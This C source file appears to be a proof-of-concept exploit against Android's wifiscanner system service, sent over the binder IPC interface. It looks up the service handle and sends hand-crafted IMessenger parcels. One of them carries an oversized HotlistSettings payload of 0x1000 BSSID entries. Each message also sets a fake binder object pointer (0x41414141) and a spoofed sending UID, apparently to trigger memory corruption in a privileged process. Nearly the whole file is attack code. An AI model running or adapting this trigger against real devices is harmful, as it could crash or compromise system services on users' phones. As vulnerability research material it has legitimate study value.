#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <unistd.h>

#include "binder.h"

int main(int argc, char** argv) {
  struct binder_state* bs;
  struct binder_io msg;
  struct binder_io reply;
  uint32_t wifi_scanner_handle = 0;
  uint32_t handle = 0;
  size_t tmp = 0;
  char data[0x100000];

  fprintf(stderr, "[0] opening /dev/binder\n");
  bs = binder_open(0x400000);

  fprintf(stderr, "[0] looking up wifiscanner\n");
  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.os.IServiceManager");
  bio_put_string16_x(&msg, "wifiscanner");
  binder_call(bs, &msg, &reply, 0, 1);
  wifi_scanner_handle = bio_get_ref(&reply);
  fprintf(stderr, "[0] got handle %08x\n", wifi_scanner_handle);
  binder_acquire(bs, wifi_scanner_handle);
  binder_done(bs, &msg, &reply);

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.net.wifi.IWifiScanner");
  binder_call(bs, &msg, &reply, wifi_scanner_handle, 1);
  bio_get_uint32(&reply);
  bio_get_uint32(&reply);
  handle = bio_get_ref(&reply);
  fprintf(stderr, "[0] got handle %08x\n", handle);
  binder_acquire(bs, handle);
  binder_done(bs, &msg, &reply);

  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.os.IMessenger");
  bio_put_uint32(&msg, 1);

  //  private void readFromParcel(Parcel source) {
  //      what = source.readInt();
  bio_put_uint32(&msg, 0x00011001);
  //      arg1 = source.readInt();
  bio_put_uint32(&msg, 1);
  //      arg2 = source.readInt();
  bio_put_uint32(&msg, 1);
  //      if (source.readInt() != 0) {
  //          obj = source.readParcelable(getClass().getClassLoader());
  //      }
  bio_put_uint32(&msg, 0);
  //      when = source.readLong();
  bio_put_uint32(&msg, 0);
  //      data = source.readBundle();
  bio_put_uint32(&msg, 0);
  bio_put_uint32(&msg, 0);
  //      replyTo = Messenger.readMessengerOrNullFromParcel(source);
  bio_put_obj(&msg, (void*)0x41414141);
  //      sendingUid = source.readInt();
  bio_put_uint32(&msg, 9999);
  //  }

  binder_call(bs, &msg, &reply, handle, 1);
  binder_done(bs, &msg, &reply);



  bio_init(&msg, data, sizeof(data), 4);
  bio_put_uint32(&msg, 0x100);
  bio_put_string16_x(&msg, "android.os.IMessenger");
  bio_put_uint32(&msg, 1);

  //  private void readFromParcel(Parcel source) {
  //      what = source.readInt();
  bio_put_uint32(&msg, 0x00027006);
  //      arg1 = source.readInt();
  bio_put_uint32(&msg, 1);
  //      arg2 = source.readInt();
  bio_put_uint32(&msg, 1);
  //      if (source.readInt() != 0) {
  bio_put_uint32(&msg, 1);
  //          obj = source.readParcelable(getClass().getClassLoader());
  bio_put_string16_x(&msg, "android.net.wifi.WifiScanner$HotlistSettings");
  
  //     public void writeToParcel(Parcel dest, int flags) {
  //          dest.writeInt(apLostThreshold);
  bio_put_uint32(&msg, 1);
  //          if (bssidInfos != null) {
  //              dest.writeInt(bssidInfos.length);
  bio_put_uint32(&msg, 0x1000);
  for (int i = 0; i < 0x1000; ++i) {  
  //              for (int i = 0; i < bssidInfos.length; i++) {
  //                  BssidInfo info = bssidInfos[i];
    char* ptr = NULL;
    asprintf(&ptr, "c0:1d:b3:3f:%02x:%02x", (i & 0xff00) >> 8, i & 0xff);
    bio_put_string16_x(&msg, ptr);
    free(ptr);
  //                  dest.writeString(info.bssid);
    bio_put_uint32(&msg, 0xc01d0000 + i);
  //                  dest.writeInt(info.low);
    bio_put_uint32(&msg, 0xc01d0000 + i + 1);
  //                  dest.writeInt(info.high);
    bio_put_uint32(&msg, 0xc01d0000 + i + 2);
  //                  dest.writeInt(info.frequencyHint);
  //              }
  }
  //          } else {
  //              dest.writeInt(0);
  //          }
  //      }
  
  //      when = source.readLong();
  bio_put_uint32(&msg, 0);
  //      data = source.readBundle();
  bio_put_uint32(&msg, 0);
  bio_put_uint32(&msg, 0);
  //      replyTo = Messenger.readMessengerOrNullFromParcel(source);
  bio_put_obj(&msg, (void*)0x41414141);
  //      sendingUid = source.readInt();
  bio_put_uint32(&msg, 9999);
  //  }

  binder_call(bs, &msg, &reply, handle, 1);
  binder_done(bs, &msg, &reply);

  return 0;
}
